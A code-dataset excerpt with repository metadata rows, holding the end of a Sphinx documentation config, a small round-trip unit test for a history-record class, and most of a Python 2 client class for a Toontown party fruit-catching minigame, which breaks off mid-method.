# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'anime-downloader.tex', 'anime-downloader Documentation',
'Vishnunarayan K I', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'anime-downloader', 'anime-downloader Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'anime-downloader', 'anime-downloader Documentation',
author, 'anime-downloader', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# -- Extension configuration -------------------------------------------------
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
| [
"appukuttancr@gmail.com"
] | appukuttancr@gmail.com |
a060b5bb569c1e8afe3f414bec60273315ca021f | 44796f576b14460f18cbe35e231d1920625c94f1 | /tests/test_history_recorder.py | 02f970da9d176c48d19cc51ce40af1d021c40bb7 | [
"MIT"
] | permissive | kpot/kerl | d8ef913a53207da70ed076efcbfaa08c301bfbd8 | 5f39f547984cd5ded2ff3a9d6092da5055b6009a | refs/heads/master | 2022-07-13T00:02:11.797164 | 2021-03-30T04:11:56 | 2021-03-30T04:11:56 | 134,604,607 | 11 | 4 | MIT | 2022-06-21T21:20:27 | 2018-05-23T17:33:57 | Python | UTF-8 | Python | false | false | 455 | py | import datetime
from kerl.common.history import HistoryRecord
def test_history_record_encoding():
    """Round-trip check: a HistoryRecord encoded and then decoded must
    compare equal to the original (including the datetime field)."""
    orig_record = HistoryRecord(
        date_time=datetime.datetime.now(),
        exact_reward=2,
        average_reward=10,
        num_observations=1000,
        diff_seconds=5,
        diff_observations=15)
    encoded_record = orig_record.encode()
    decoded_record = HistoryRecord.decode(encoded_record)
    assert decoded_record == orig_record
| [
"kimavr@gmail.com"
] | kimavr@gmail.com |
a31238640d5eae14cbeb79d20eede97d6bcd4516 | ba0cbdae81c171bd4be7b12c0594de72bd6d625a | /MyToontown/Toontown2016/toontown/parties/DistributedPartyCatchActivity.py | e776ef0b7ed00871035165e64ae831b02d97636a | [] | no_license | sweep41/Toontown-2016 | 65985f198fa32a832e762fa9c59e59606d6a40a3 | 7732fb2c27001264e6dd652c057b3dc41f9c8a7d | refs/heads/master | 2021-01-23T16:04:45.264205 | 2017-06-04T02:47:34 | 2017-06-04T02:47:34 | 93,279,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40,123 | py | from pandac.PandaModules import Vec3, Point3, Point4, TextNode, NodePath
from pandac.PandaModules import CollisionHandlerEvent, CollisionNode, CollisionSphere
from direct.distributed.ClockDelta import globalClockDelta
from direct.interval.IntervalGlobal import Sequence, Parallel
from direct.interval.IntervalGlobal import LerpScaleInterval, LerpFunctionInterval, LerpColorScaleInterval, LerpPosInterval
from direct.interval.IntervalGlobal import SoundInterval, WaitInterval
from direct.showbase.PythonUtil import Functor, bound, lerp, SerialNumGen
from direct.showbase.RandomNumGen import RandomNumGen
from direct.task.Task import Task
from direct.distributed import DistributedSmoothNode
from direct.directnotify import DirectNotifyGlobal
from direct.interval.FunctionInterval import Wait, Func
from toontown.toonbase import TTLocalizer
from toontown.toon import Toon
from toontown.toonbase import ToontownGlobals
from toontown.minigame.Trajectory import Trajectory
from toontown.minigame.OrthoDrive import OrthoDrive
from toontown.minigame.OrthoWalk import OrthoWalk
from toontown.minigame.DropPlacer import PartyRegionDropPlacer
from toontown.parties import PartyGlobals
from toontown.parties.PartyCatchActivityToonSD import PartyCatchActivityToonSD
from toontown.parties.DistributedPartyActivity import DistributedPartyActivity
from toontown.parties.DistributedPartyCatchActivityBase import DistributedPartyCatchActivityBase
from toontown.parties.DistributedPartyCannonActivity import DistributedPartyCannonActivity
from toontown.parties.activityFSMs import CatchActivityFSM
class DistributedPartyCatchActivity(DistributedPartyActivity, DistributedPartyCatchActivityBase):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedPartyCatchActivity')
DropTaskName = 'dropSomething'
DropObjectPlurals = {'apple': TTLocalizer.PartyCatchActivityApples,
'orange': TTLocalizer.PartyCatchActivityOranges,
'pear': TTLocalizer.PartyCatchActivityPears,
'coconut': TTLocalizer.PartyCatchActivityCoconuts,
'watermelon': TTLocalizer.PartyCatchActivityWatermelons,
'pineapple': TTLocalizer.PartyCatchActivityPineapples,
'anvil': TTLocalizer.PartyCatchActivityAnvils}
    class Generation:
        """Bookkeeping for one 'generation' (round) of the catch game:
        when it started (local and network clock), how many players it
        had, and what has been dropped/caught so far."""

        def __init__(self, generation, startTime, startNetworkTime, numPlayers):
            self.generation = generation
            self.startTime = startTime
            self.startNetworkTime = startNetworkTime
            self.numPlayers = numPlayers
            # Flipped once the drop schedule for this generation is built.
            self.hasBeenScheduled = False
            # Filled in as the generation runs.
            self.droppedObjNames = []
            self.dropSchedule = []
            self.numItemsDropped = 0
            self.droppedObjCaught = {}
    def __init__(self, cr):
        """Set up the distributed activity (host-initiated catch game with
        a reward GUI) and enable avatar smoothing/look-around."""
        DistributedPartyActivity.__init__(self, cr, PartyGlobals.ActivityIds.PartyCatch, PartyGlobals.ActivityTypes.HostInitiated, wantRewardGui=True)
        self.setUsesSmoothing()
        self.setUsesLookAround()
        # Serial numbers for uniquely naming per-drop resources.
        self._sNumGen = SerialNumGen()
    def getTitle(self):
        # Localized activity title shown on the sign/GUI.
        return TTLocalizer.PartyCatchActivityTitle
    def getInstructions(self):
        # Localized instructions; the template names the hazard ('anvils').
        return TTLocalizer.PartyCatchActivityInstructions % {'badThing': self.DropObjectPlurals['anvil']}
    def generate(self):
        """Distributed-object generate: initialize per-session generation
        bookkeeping and the deterministic drop RNG seed base."""
        DistributedPartyActivity.generate(self)
        self.notify.info('localAvatar doId: %s' % base.localAvatar.doId)
        self.notify.info('generate()')
        self._generateFrame = globalClock.getFrameCount()
        # generation id -> Generation record.
        self._id2gen = {}
        # Generation ids ordered by start time (see _addGeneration).
        self._orderedGenerations = []
        self._orderedGenerationIndex = None
        # Seed derived from the doId so all clients agree on drops.
        rng = RandomNumGen(self.doId)
        self._generationSeedBase = rng.randrange(1000)
        self._lastDropTime = 0.0
        return
def getCurGeneration(self):
if self._orderedGenerationIndex is None:
return
return self._orderedGenerations[self._orderedGenerationIndex]
    def _addGeneration(self, generation, startTime, startNetworkTime, numPlayers):
        """Record a new generation and insert its id into
        self._orderedGenerations, keeping the list sorted by
        (start time, generation id); bump the current-generation index if
        the insertion happens at or before it."""
        self._id2gen[generation] = self.Generation(generation, startTime, startNetworkTime, numPlayers)
        # Linear scan for the insertion point.
        i = 0
        while 1:
            if i >= len(self._orderedGenerations):
                break
            gen = self._orderedGenerations[i]
            # NOTE(review): existing entries' .startTime is compared against
            # the incoming startNetworkTime -- assumes the two are on the
            # same time base; TODO confirm.
            startNetT = self._id2gen[gen].startTime
            genId = self._id2gen[gen].generation
            if startNetT > startNetworkTime:
                break
            if startNetT == startNetworkTime and genId > generation:
                break
            i += 1
        self._orderedGenerations = self._orderedGenerations[:i] + [generation] + self._orderedGenerations[i:]
        if self._orderedGenerationIndex is not None:
            # Keep the index pointing at the same generation after insert.
            if self._orderedGenerationIndex >= i:
                self._orderedGenerationIndex += 1
    def _removeGeneration(self, generation):
        """Forget a generation: drop its record and splice its id out of
        the ordered list, adjusting (or clearing) the current index so it
        keeps referring to the same generation."""
        del self._id2gen[generation]
        i = self._orderedGenerations.index(generation)
        self._orderedGenerations = self._orderedGenerations[:i] + self._orderedGenerations[i + 1:]
        if self._orderedGenerationIndex is not None:
            if len(self._orderedGenerations):
                if self._orderedGenerationIndex >= i:
                    self._orderedGenerationIndex -= 1
            else:
                # No generations left.
                self._orderedGenerationIndex = None
        return
    def announceGenerate(self):
        """Post-generate hook: name the collision event fired by the
        activity's floor trigger before the base class finishes setup."""
        self.notify.info('announceGenerate()')
        self.catchTreeZoneEvent = 'fence_floor'
        DistributedPartyActivity.announceGenerate(self)
    def load(self, loadModels = 1, arenaModel = 'partyCatchTree'):
        """Load all assets for the activity: the arena model, exit sign
        text, avatar parent node, drop-object models and sounds; ends in
        the 'Idle' FSM state.

        loadModels=0 skips the drop-object model loading (used by
        subclasses/tests); arenaModel selects the arena scene file.
        """
        self.notify.info('load()')
        DistributedPartyCatchActivity.notify.debug('PartyCatch: load')
        self.activityFSM = CatchActivityFSM(self)
        # Dev-only tuning dump: prints drop-rate tables per player count.
        # (Python 2 print statements.)
        if __dev__:
            for o in xrange(3):
                print {0: 'SPOTS PER PLAYER',
                 1: 'DROPS PER MINUTE PER SPOT DURING NORMAL DROP PERIOD',
                 2: 'DROPS PER MINUTE PER PLAYER DURING NORMAL DROP PERIOD'}[o]
                for i in xrange(1, self.FallRateCap_Players + 10):
                    self.defineConstants(forceNumPlayers=i)
                    numDropLocations = self.DropRows * self.DropColumns
                    numDropsPerMin = 60.0 / self.DropPeriod
                    if o == 0:
                        spotsPerPlayer = numDropLocations / float(i)
                        print '%2d PLAYERS: %s' % (i, spotsPerPlayer)
                    elif o == 1:
                        numDropsPerMinPerSpot = numDropsPerMin / numDropLocations
                        print '%2d PLAYERS: %s' % (i, numDropsPerMinPerSpot)
                    elif i > 0:
                        numDropsPerMinPerPlayer = numDropsPerMin / i
                        print '%2d PLAYERS: %s' % (i, numDropsPerMinPerPlayer)
        self.defineConstants()
        # Arena scenery.
        self.treesAndFence = loader.loadModel('phase_13/models/parties/%s' % arenaModel)
        self.treesAndFence.setScale(0.9)
        self.treesAndFence.find('**/fence_floor').setPos(0.0, 0.0, 0.1)
        self.treesAndFence.reparentTo(self.root)
        ground = self.treesAndFence.find('**/groundPlane')
        ground.setBin('ground', 1)
        DistributedPartyActivity.load(self)
        # Exit sign text card.
        exitText = TextNode('PartyCatchExitText')
        exitText.setCardAsMargin(0.1, 0.1, 0.1, 0.1)
        exitText.setCardDecal(True)
        exitText.setCardColor(1.0, 1.0, 1.0, 0.0)
        exitText.setText(TTLocalizer.PartyCatchActivityExit)
        exitText.setTextColor(0.0, 8.0, 0.0, 0.9)
        exitText.setAlign(exitText.ACenter)
        exitText.setFont(ToontownGlobals.getBuildingNametagFont())
        exitText.setShadowColor(0, 0, 0, 1)
        exitText.setBin('fixed')
        if TTLocalizer.BuildingNametagShadow:
            exitText.setShadow(*TTLocalizer.BuildingNametagShadow)
        exitTextLoc = self.treesAndFence.find('**/loc_exitSignText')
        exitTextNp = exitTextLoc.attachNewNode(exitText)
        exitTextNp.setDepthWrite(0)
        exitTextNp.setScale(4)
        exitTextNp.setZ(-.5)
        self.sign.reparentTo(self.treesAndFence.find('**/loc_eventSign'))
        self.sign.wrtReparentTo(self.root)
        # Node that playing avatars are reparented to (see handleToonJoined).
        self.avatarNodePath = NodePath('PartyCatchAvatarNodePath')
        self.avatarNodePath.reparentTo(self.root)
        self._avatarNodePathParentToken = 3
        base.cr.parentMgr.registerParent(self._avatarNodePathParentToken, self.avatarNodePath)
        # avId -> PartyCatchActivityToonSD state machines.
        self.toonSDs = {}
        self.dropShadow = loader.loadModelOnce('phase_3/models/props/drop_shadow')
        self.dropObjModels = {}
        if loadModels:
            self.__loadDropModels()
        # Sound effects.
        self.sndGoodCatch = base.loader.loadSfx('phase_4/audio/sfx/SZ_DD_treasure.ogg')
        self.sndOof = base.loader.loadSfx('phase_4/audio/sfx/MG_cannon_hit_dirt.ogg')
        self.sndAnvilLand = base.loader.loadSfx('phase_4/audio/sfx/AA_drop_anvil_miss.ogg')
        self.sndPerfect = base.loader.loadSfx('phase_4/audio/sfx/ring_perfect.ogg')
        self.__textGen = TextNode('partyCatchActivity')
        self.__textGen.setFont(ToontownGlobals.getSignFont())
        self.__textGen.setAlign(TextNode.ACenter)
        self.activityFSM.request('Idle')
    def __loadDropModels(self):
        """Load one model per droppable object type into
        self.dropObjModels, applying per-type scale/orientation tweaks."""
        for objType in PartyGlobals.DropObjectTypes:
            model = loader.loadModel(objType.modelPath)
            self.dropObjModels[objType.name] = model
            # Per-fruit visual scale tweaks (types absent here keep scale 1).
            modelScales = {'apple': 0.7,
             'orange': 0.7,
             'pear': 0.5,
             'coconut': 0.7,
             'watermelon': 0.6,
             'pineapple': 0.45}
            if modelScales.has_key(objType.name):
                model.setScale(modelScales[objType.name])
            # Per-type position/orientation adjustments.
            if objType == PartyGlobals.Name2DropObjectType['pear']:
                model.setZ(-.6)
            if objType == PartyGlobals.Name2DropObjectType['coconut']:
                model.setP(180)
            if objType == PartyGlobals.Name2DropObjectType['watermelon']:
                model.setH(135)
                model.setZ(-.5)
            if objType == PartyGlobals.Name2DropObjectType['pineapple']:
                model.setZ(-1.7)
            if objType == PartyGlobals.Name2DropObjectType['anvil']:
                model.setZ(-self.ObjRadius)
            model.flattenStrong()
    def unload(self):
        """Tear down everything load() created: intervals, tasks, toon
        state machines, scenery, models and sounds."""
        DistributedPartyCatchActivity.notify.debug('unload')
        self.finishAllDropIntervals()
        self.destroyOrthoWalk()
        DistributedPartyActivity.unload(self)
        self.stopDropTask()
        del self.activityFSM
        del self.__textGen
        # Unload every remaining toon state machine.
        for avId in self.toonSDs.keys():
            if self.toonSDs.has_key(avId):
                toonSD = self.toonSDs[avId]
                toonSD.unload()
        del self.toonSDs
        self.treesAndFence.removeNode()
        del self.treesAndFence
        self.dropShadow.removeNode()
        del self.dropShadow
        base.cr.parentMgr.unregisterParent(self._avatarNodePathParentToken)
        for model in self.dropObjModels.values():
            model.removeNode()
        del self.dropObjModels
        del self.sndGoodCatch
        del self.sndOof
        del self.sndAnvilLand
        del self.sndPerfect
    def setStartTimestamp(self, timestamp32):
        """Network setter: convert the server's 32-bit start timestamp to
        local clock time (basis for getCurrentCatchActivityTime)."""
        self.notify.info('setStartTimestamp(%s)' % (timestamp32,))
        self._startTimestamp = globalClockDelta.networkToLocalTime(timestamp32, bits=32)
    def getCurrentCatchActivityTime(self):
        # Seconds elapsed since the server-declared activity start.
        return globalClock.getFrameTime() - self._startTimestamp
    def getObjModel(self, objName):
        # Fresh copy of a preloaded drop-object model, parented to hidden.
        return self.dropObjModels[objName].copyTo(hidden)
    def joinRequestDenied(self, reason):
        """Server refused our join request: return the toon to walk mode."""
        DistributedPartyActivity.joinRequestDenied(self, reason)
        base.cr.playGame.getPlace().fsm.request('walk')
    def handleToonJoined(self, toonId):
        """A toon joined the activity: create its state machine, raise its
        LOD, and (if the game is already running) put it into play."""
        if not self.toonSDs.has_key(toonId):
            toonSD = PartyCatchActivityToonSD(toonId, self)
            self.toonSDs[toonId] = toonSD
            toonSD.load()
        self.notify.debug('handleToonJoined : currentState = %s' % self.activityFSM.state)
        self.cr.doId2do[toonId].useLOD(500)
        if self.activityFSM.state == 'Active':
            if self.toonSDs.has_key(toonId):
                self.toonSDs[toonId].enter()
            if base.localAvatar.doId == toonId:
                # Reparent the local toon under the activity's avatar node.
                base.localAvatar.b_setParent(self._avatarNodePathParentToken)
                self.putLocalAvatarInActivity()
            if self.toonSDs.has_key(toonId):
                self.toonSDs[toonId].fsm.request('rules')
    def handleToonExited(self, toonId):
        """A toon left the activity: restore its LOD, tear down its state
        machine, and reparent the local toon back to render."""
        self.notify.debug('handleToonExited( toonId=%s )' % toonId)
        if self.cr.doId2do.has_key(toonId):
            self.cr.doId2do[toonId].resetLOD()
        if self.toonSDs.has_key(toonId):
            self.toonSDs[toonId].fsm.request('notPlaying')
            self.toonSDs[toonId].exit()
            self.toonSDs[toonId].unload()
            del self.toonSDs[toonId]
        if base.localAvatar.doId == toonId:
            base.localAvatar.b_setParent(ToontownGlobals.SPRender)
    def takeLocalAvatarOutOfActivity(self):
        """Restore normal camera control and smoothing for the local toon
        after it stops playing."""
        self.notify.debug('localToon has left the circle')
        camera.reparentTo(base.localAvatar)
        base.localAvatar.startUpdateSmartCamera()
        base.localAvatar.enableSmartCameraViews()
        base.localAvatar.setCameraPositionByIndex(base.localAvatar.cameraIndex)
        DistributedSmoothNode.activateSmoothing(1, 0)
    def _enableCollisions(self):
        """Start listening for the floor-trigger enter/exit events and for
        local cannon landings (a cannon can drop a toon inside the area)."""
        DistributedPartyActivity._enableCollisions(self)
        self._enteredTree = False
        self.accept('enter' + self.catchTreeZoneEvent, self._toonMayHaveEnteredTree)
        self.accept('again' + self.catchTreeZoneEvent, self._toonMayHaveEnteredTree)
        self.accept('exit' + self.catchTreeZoneEvent, self._toonExitedTree)
        self.accept(DistributedPartyCannonActivity.LOCAL_TOON_LANDED_EVENT, self._handleCannonLanded)
    def _disableCollisions(self):
        """Stop listening for the events registered in _enableCollisions."""
        self.ignore(DistributedPartyCannonActivity.LOCAL_TOON_LANDED_EVENT)
        self.ignore('enter' + self.catchTreeZoneEvent)
        self.ignore('again' + self.catchTreeZoneEvent)
        self.ignore('exit' + self.catchTreeZoneEvent)
        DistributedPartyActivity._disableCollisions(self)
    def _handleCannonLanded(self):
        """Cannon shot landed: if the local toon came down inside the
        activity's stage rectangle, treat it as entering the area."""
        x = base.localAvatar.getX()
        y = base.localAvatar.getY()
        if x > self.x - self.StageHalfWidth and x < self.x + self.StageHalfWidth and y > self.y - self.StageHalfHeight and y < self.y + self.StageHalfHeight:
            self._toonEnteredTree(None)
        return
    def _toonMayHaveEnteredTree(self, collEntry):
        """Floor-trigger callback; filters out duplicates and airborne
        touches (e.g. flying over) before registering a real entry."""
        if self._enteredTree:
            return
        if base.localAvatar.controlManager.currentControls.getIsAirborne():
            return
        self._toonEnteredTree(collEntry)
    def _toonEnteredTree(self, collEntry):
        """Request to join the activity when the local toon steps onto the stage (Active or Idle only)."""
        self.notify.debug('_toonEnteredTree : avid = %s' % base.localAvatar.doId)
        self.notify.debug('_toonEnteredTree : currentState = %s' % self.activityFSM.state)
        if self.isLocalToonInActivity():
            return
        if self.activityFSM.state == 'Active':
            base.cr.playGame.getPlace().fsm.request('activity')
            self.d_toonJoinRequest()
        elif self.activityFSM.state == 'Idle':
            base.cr.playGame.getPlace().fsm.request('activity')
            self.d_toonJoinRequest()
        self._enteredTree = True
    def _toonExitedTree(self, collEntry):
        """Leave the activity when the local toon walks off the stage while playing."""
        self.notify.debug('_toonExitedTree : avid = %s' % base.localAvatar.doId)
        self._enteredTree = False
        if hasattr(base.cr.playGame.getPlace(), 'fsm') and self.activityFSM.state == 'Active' and self.isLocalToonInActivity():
            if self.toonSDs.has_key(base.localAvatar.doId):
                self.takeLocalAvatarOutOfActivity()
                self.toonSDs[base.localAvatar.doId].fsm.request('notPlaying')
            self.d_toonExitDemand()
    def setToonsPlaying(self, toonIds):
        """Server update of the active player list; pull the local toon out if it was dropped."""
        self.notify.info('setToonsPlaying(%s)' % (toonIds,))
        DistributedPartyActivity.setToonsPlaying(self, toonIds)
        if self.isLocalToonInActivity() and base.localAvatar.doId not in toonIds:
            if self.toonSDs.has_key(base.localAvatar.doId):
                self.takeLocalAvatarOutOfActivity()
                self.toonSDs[base.localAvatar.doId].fsm.request('notPlaying')
def __genText(self, text):
self.__textGen.setText(text)
return self.__textGen.generate()
def getNumPlayers(self):
return len(self.toonIds)
    def defineConstants(self, forceNumPlayers = None):
        """Recompute gameplay tuning constants (speeds, drop counts, trajectories) for the player count."""
        DistributedPartyCatchActivity.notify.debug('defineConstants')
        self.ShowObjSpheres = 0
        self.ShowToonSpheres = 0
        self.useGravity = True
        self.trickShadows = True
        if forceNumPlayers is None:
            numPlayers = self.getNumPlayers()
        else:
            numPlayers = forceNumPlayers
        # difficulty scaling (ToonSpeed, totalDrops, numFruits, numAnvils) follows player count
        self.calcDifficultyConstants(numPlayers)
        DistributedPartyCatchActivity.notify.debug('ToonSpeed: %s' % self.ToonSpeed)
        DistributedPartyCatchActivity.notify.debug('total drops: %s' % self.totalDrops)
        DistributedPartyCatchActivity.notify.debug('numFruits: %s' % self.numFruits)
        DistributedPartyCatchActivity.notify.debug('numAnvils: %s' % self.numAnvils)
        self.ObjRadius = 1.0
        dropRegionTable = PartyRegionDropPlacer.getDropRegionTable(numPlayers)
        self.DropRows, self.DropColumns = len(dropRegionTable), len(dropRegionTable[0])
        for objType in PartyGlobals.DropObjectTypes:
            DistributedPartyCatchActivity.notify.debug('*** Object Type: %s' % objType.name)
            objType.onscreenDuration = objType.onscreenDurMult * self.BaselineOnscreenDropDuration
            DistributedPartyCatchActivity.notify.debug('onscreenDuration=%s' % objType.onscreenDuration)
            # Solve x = x_0 + v_0*t + g*t^2/2 for g so the object falls from
            # MinOffscreenHeight to the ground in exactly onscreenDuration seconds.
            v_0 = 0.0
            t = objType.onscreenDuration
            x_0 = self.MinOffscreenHeight
            x = 0.0
            g = 2.0 * (x - x_0 - v_0 * t) / (t * t)
            DistributedPartyCatchActivity.notify.debug('gravity=%s' % g)
            objType.trajectory = Trajectory(0, Vec3(0, 0, x_0), Vec3(0, 0, v_0), gravMult=abs(g / Trajectory.gravity))
            objType.fallDuration = objType.onscreenDuration + self.OffscreenTime
        return
def grid2world(self, column, row):
x = column / float(self.DropColumns - 1)
y = row / float(self.DropRows - 1)
x = x * 2.0 - 1.0
y = y * 2.0 - 1.0
x *= self.StageHalfWidth
y *= self.StageHalfHeight
return (x, y)
    def showPosts(self):
        """Place four marker avatars at the corners of the catch stage (debug aid)."""
        self.hidePosts()
        # NOTE(review): the markers are Toon instances but the loop variable is
        # named 'tree' -- presumably leftover naming from an earlier version.
        self.posts = [Toon.Toon(),
         Toon.Toon(),
         Toon.Toon(),
         Toon.Toon()]
        for i in xrange(len(self.posts)):
            tree = self.posts[i]
            tree.reparentTo(render)
            # corners: i selects the sign of each half-extent
            x = self.StageHalfWidth
            y = self.StageHalfHeight
            if i > 1:
                x = -x
            if i % 2:
                y = -y
            tree.setPos(x + self.x, y + self.y, 0)
def hidePosts(self):
if hasattr(self, 'posts'):
for tree in self.posts:
tree.removeNode()
del self.posts
    def showDropGrid(self):
        """Populate every drop cell with a 1/3-scale toon marker (debug aid)."""
        self.hideDropGrid()
        self.dropMarkers = []
        for row in xrange(self.DropRows):
            self.dropMarkers.append([])
            rowList = self.dropMarkers[row]
            for column in xrange(self.DropColumns):
                toon = Toon.Toon()
                toon.setDNA(base.localAvatar.getStyle())
                toon.reparentTo(self.root)
                toon.setScale(1.0 / 3)
                x, y = self.grid2world(column, row)
                toon.setPos(x, y, 0)
                rowList.append(toon)
def hideDropGrid(self):
if hasattr(self, 'dropMarkers'):
for row in self.dropMarkers:
for marker in row:
marker.removeNode()
del self.dropMarkers
    def handleToonDisabled(self, avId):
        """Clean up state-data for a toon whose distributed object was disabled (disconnect)."""
        DistributedPartyCatchActivity.notify.debug('handleToonDisabled')
        DistributedPartyCatchActivity.notify.debug('avatar ' + str(avId) + ' disabled')
        if self.toonSDs.has_key(avId):
            self.toonSDs[avId].exit(unexpectedExit=True)
            del self.toonSDs[avId]
    def turnOffSmoothingOnGuests(self):
        # Intentionally a no-op for this activity.
        pass
    def setState(self, newState, timestamp):
        """Server-driven activity state change; on 'Active', auto-join if already standing on stage."""
        self.notify.info('setState(%s, %s)' % (newState, timestamp))
        DistributedPartyCatchActivity.notify.debug('setState( newState=%s, ... )' % newState)
        DistributedPartyActivity.setState(self, newState, timestamp)
        self.activityFSM.request(newState)
        if newState == 'Active':
            if base.localAvatar.doId != self.party.partyInfo.hostId:
                # skip the auto-join on the frame the object was generated -- TODO confirm intent
                if globalClock.getFrameCount() > self._generateFrame:
                    if base.localAvatar.getX() > self.x - self.StageHalfWidth and base.localAvatar.getX() < self.x + self.StageHalfWidth and base.localAvatar.getY() > self.y - self.StageHalfHeight and base.localAvatar.getY() < self.y + self.StageHalfHeight:
                        self._toonEnteredTree(None)
        return
    def putLocalAvatarInActivity(self):
        """Switch the local toon into activity mode and set up the fixed overhead camera."""
        if base.cr.playGame.getPlace() and hasattr(base.cr.playGame.getPlace(), 'fsm'):
            base.cr.playGame.getPlace().fsm.request('activity', [False])
        else:
            self.notify.info("Avoided crash: toontown.parties.DistributedPartyCatchActivity:632, toontown.parties.DistributedPartyCatchActivity:1198, toontown.parties.activityFSMMixins:49, direct.fsm.FSM:423, AttributeError: 'NoneType' object has no attribute 'fsm'")
        base.localAvatar.stopUpdateSmartCamera()
        camera.reparentTo(self.treesAndFence)
        camera.setPosHpr(0.0, -63.0, 30.0, 0.0, -20.0, 0.0)
        # lazily build the catch collision spheres exactly once
        if not hasattr(self, 'ltLegsCollNode'):
            self.createCatchCollisions()
def createCatchCollisions(self):
radius = 0.7
handler = CollisionHandlerEvent()
handler.setInPattern('ltCatch%in')
self.ltLegsCollNode = CollisionNode('catchLegsCollNode')
self.ltLegsCollNode.setCollideMask(PartyGlobals.CatchActivityBitmask)
self.ltHeadCollNode = CollisionNode('catchHeadCollNode')
self.ltHeadCollNode.setCollideMask(PartyGlobals.CatchActivityBitmask)
self.ltLHandCollNode = CollisionNode('catchLHandCollNode')
self.ltLHandCollNode.setCollideMask(PartyGlobals.CatchActivityBitmask)
self.ltRHandCollNode = CollisionNode('catchRHandCollNode')
self.ltRHandCollNode.setCollideMask(PartyGlobals.CatchActivityBitmask)
legsCollNodepath = base.localAvatar.attachNewNode(self.ltLegsCollNode)
legsCollNodepath.hide()
head = base.localAvatar.getHeadParts().getPath(2)
headCollNodepath = head.attachNewNode(self.ltHeadCollNode)
headCollNodepath.hide()
lHand = base.localAvatar.getLeftHands()[0]
lHandCollNodepath = lHand.attachNewNode(self.ltLHandCollNode)
lHandCollNodepath.hide()
rHand = base.localAvatar.getRightHands()[0]
rHandCollNodepath = rHand.attachNewNode(self.ltRHandCollNode)
rHandCollNodepath.hide()
base.localAvatar.cTrav.addCollider(legsCollNodepath, handler)
base.localAvatar.cTrav.addCollider(headCollNodepath, handler)
base.localAvatar.cTrav.addCollider(lHandCollNodepath, handler)
base.localAvatar.cTrav.addCollider(lHandCollNodepath, handler)
if self.ShowToonSpheres:
legsCollNodepath.show()
headCollNodepath.show()
lHandCollNodepath.show()
rHandCollNodepath.show()
self.ltLegsCollNode.addSolid(CollisionSphere(0, 0, radius, radius))
self.ltHeadCollNode.addSolid(CollisionSphere(0, 0, 0, radius))
self.ltLHandCollNode.addSolid(CollisionSphere(0, 0, 0, 2 * radius / 3.0))
self.ltRHandCollNode.addSolid(CollisionSphere(0, 0, 0, 2 * radius / 3.0))
self.toonCollNodes = [legsCollNodepath,
headCollNodepath,
lHandCollNodepath,
rHandCollNodepath]
    def destroyCatchCollisions(self):
        """Remove the catch collision solids and colliders created by createCatchCollisions."""
        if not hasattr(self, 'ltLegsCollNode'):
            return
        for collNode in self.toonCollNodes:
            while collNode.node().getNumSolids():
                collNode.node().removeSolid(0)
            base.localAvatar.cTrav.removeCollider(collNode)
        del self.toonCollNodes
        del self.ltLegsCollNode
        del self.ltHeadCollNode
        del self.ltLHandCollNode
        del self.ltRHandCollNode
    def timerExpired(self):
        # Intentionally a no-op: the end of the game is driven by server state changes.
        pass
    def __handleCatch(self, generation, objNum):
        """Local collision handler: show the catch, claim it with the AI, and stop the drop."""
        DistributedPartyCatchActivity.notify.debug('catch: %s' % [generation, objNum])
        if base.localAvatar.doId not in self.toonIds:
            return
        self.showCatch(base.localAvatar.doId, generation, objNum)
        objName = self._id2gen[generation].droppedObjNames[objNum]
        objTypeId = PartyGlobals.Name2DOTypeId[objName]
        self.sendUpdate('claimCatch', [generation, objNum, objTypeId])
        self.finishDropInterval(generation, objNum)
    def showCatch(self, avId, generation, objNum):
        """Play the visual result of a catch: eat the fruit if it is good, fall over if not."""
        if not self.toonSDs.has_key(avId):
            return
        isLocal = avId == base.localAvatar.doId
        if generation not in self._id2gen:
            return
        if not self._id2gen[generation].hasBeenScheduled:
            return
        objName = self._id2gen[generation].droppedObjNames[objNum]
        objType = PartyGlobals.Name2DropObjectType[objName]
        if objType.good:
            # droppedObjCaught de-duplicates: only the first catch of an object animates
            if not self._id2gen[generation].droppedObjCaught.has_key(objNum):
                if isLocal:
                    base.playSfx(self.sndGoodCatch)
                fruit = self.getObjModel(objName)
                toon = self.getAvatar(avId)
                rHand = toon.getRightHands()[1]
                self.toonSDs[avId].eatFruit(fruit, rHand)
        else:
            # bad object (anvil): knock the toon down
            self.toonSDs[avId].fsm.request('fallForward')
        self._id2gen[generation].droppedObjCaught[objNum] = 1
    def setObjectCaught(self, avId, generation, objNum):
        """AI broadcast that a toon caught an object; mirror it locally and tally good catches."""
        self.notify.info('setObjectCaught(%s, %s, %s)' % (avId, generation, objNum))
        if self.activityFSM.state != 'Active':
            DistributedPartyCatchActivity.notify.warning('ignoring msg: object %s caught by %s' % (objNum, avId))
            return
        isLocal = avId == base.localAvatar.doId
        if not isLocal:
            # local catches were already shown by __handleCatch
            DistributedPartyCatchActivity.notify.debug('AI: avatar %s caught %s' % (avId, objNum))
            self.finishDropInterval(generation, objNum)
            self.showCatch(avId, generation, objNum)
        self._scheduleGenerations()
        gen = self._id2gen[generation]
        if gen.hasBeenScheduled:
            objName = gen.droppedObjNames[objNum]
            if PartyGlobals.Name2DropObjectType[objName].good:
                # fruitsCaught only exists while the activity is Active
                if hasattr(self, 'fruitsCaught'):
                    self.fruitsCaught += 1
def finishDropInterval(self, generation, objNum):
if hasattr(self, 'dropIntervals'):
if self.dropIntervals.has_key((generation, objNum)):
